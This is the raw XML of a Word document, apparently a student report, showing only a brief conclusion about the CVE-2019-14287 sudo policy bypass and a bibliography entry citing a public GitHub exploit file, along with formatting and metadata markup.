      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDFA5AD" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC38248" w14:textId="1E250FE6" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A333B6" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322"/>
    <w:p w14:paraId="47C94CE7" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322"/>
    <w:p w14:paraId="5669E018" w14:textId="4103BF29" w:rsidR="00647322" w:rsidRPr="00D40606" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I was explained the CVE 2019-14287 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security policy bypass vulnerability with terminal codes and then after the c program exploitation. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>That's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D40606">
        <w:t xml:space="preserve"> the terrifying version and we shouldn't forget CVE-2019-14287 when talking about how strong and famous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40606">
        <w:t xml:space="preserve"> is. That said, it is also worth noting that in a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>particular configuration</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D40606">
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40606">
        <w:t xml:space="preserve"> protection policy, called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40606">
        <w:t>," the vulnerability is valid, which helps to ensure that privileges are limited to certain users only.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6CDB0" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00D40606" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5E76A9" w14:textId="188188E0" w:rsidR="00987BF8" w:rsidRDefault="00987BF8" w:rsidP="002D2B91">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6CB984" w14:textId="3215C303" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="002D2B91">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1587689223"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="106805F2" w14:textId="381C689C" w:rsidR="002D2B91" w:rsidRDefault="002D2B91">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="378DECAB" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B9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2D2B91" w14:paraId="439077E3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1766799402"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="44296F86" w14:textId="287F5288" w:rsidR="002D2B91" w:rsidRDefault="002D2B91">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="04A831F0" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Unam3dd, "sudo-vulnerability-CVE-2019-14287/sudo_vuln.c," 04 12 2019. [Online]. Available: https://github.com/Unam3dd/sudo-vulnerability-CVE-2019-14287/blob/master/sudo_vuln.c.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="1854260B" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91">
              <w:pPr>
                <w:divId w:val="1766799402"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="01B8C074" w14:textId="28FF8234" w:rsidR="002D2B91" w:rsidRDefault="002D2B91">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="07E71D90" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRPr="00647322" w:rsidRDefault="002D2B91" w:rsidP="002D2B91">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002D2B91" w:rsidRPr="00647322" w:rsidSect="00987BF8">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A736" w14:textId="77777777" w:rsidR="00CB6718" w:rsidRDefault="00CB6718" w:rsidP="00987BF8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A14445E" w14:textId="77777777" w:rsidR="00CB6718" w:rsidRDefault="00CB6718" w:rsidP="009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13BAA619" w14:textId="77777777" w:rsidR="00987BF8" w:rsidRDefault="00987BF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6732467" w14:textId="77777777" w:rsidR="00987BF8" w:rsidRDefault="0098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A2E21" w14:textId="77777777" w:rsidR="00CB6718" w:rsidRDefault="00CB6718" w:rsidP="00987BF8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AD21DB4" w14:textId="77777777" w:rsidR="00CB6718" w:rsidRDefault="00CB6718" w:rsidP="0098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30352"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA206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C"/>
    <w:rsid w:val="00007414"/>
    <w:rsid w:val="00025E70"/>
    <w:rsid w:val="000F69A2"/>
    <w:rsid w:val="0013378F"/>
    <w:rsid w:val="001A20B6"/>
    <w:rsid w:val="00297E66"/>
    <w:rsid w:val="002D2B91"/>
    <w:rsid w:val="00341389"/>
    <w:rsid w:val="0038443F"/>
    <w:rsid w:val="0046269B"/>
    <w:rsid w:val="005F1D65"/>
    <w:rsid w:val="00647322"/>
    <w:rsid w:val="0071298C"/>
    <w:rsid w:val="00726945"/>
    <w:rsid w:val="00934F19"/>
    <w:rsid w:val="00987BF8"/>
    <w:rsid w:val="009C7966"/>
    <w:rsid w:val="009F61EA"/>
    <w:rsid w:val="00BF1DDB"/>
    <w:rsid w:val="00C01602"/>
    <w:rsid w:val="00C64329"/>
    <w:rsid w:val="00CB6718"/>
    <w:rsid w:val="00DC56A7"/>
    <w:rsid w:val="00FA5604"/>
    <w:rsid w:val="00FE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F9F2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53B9AB26-806F-42E2-BDB3-59814B43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87B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FE142C"/>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297E66"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="0098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BF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987BF8"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00987BF8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00987BF8"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00987BF8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00987BF8"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00987BF8"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00987BF8"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D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463977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17667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a19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{75A12D62-6236-4870-9F9E-BD4C435AEEB4}</b:Guid>
    <b:Title>sudo-vulnerability-CVE-2019-14287/sudo_vuln.c</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Unam3dd</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>12</b:Month>
    <b:Day>04</b:Day>
    <b:URL>https://github.com/Unam3dd/sudo-vulnerability-CVE-2019-14287/blob/master/sudo_vuln.c</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D3E052D9-2495-4479-A179-98CA2648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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hasitha Upekshitha</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-12T16:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-12T16:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>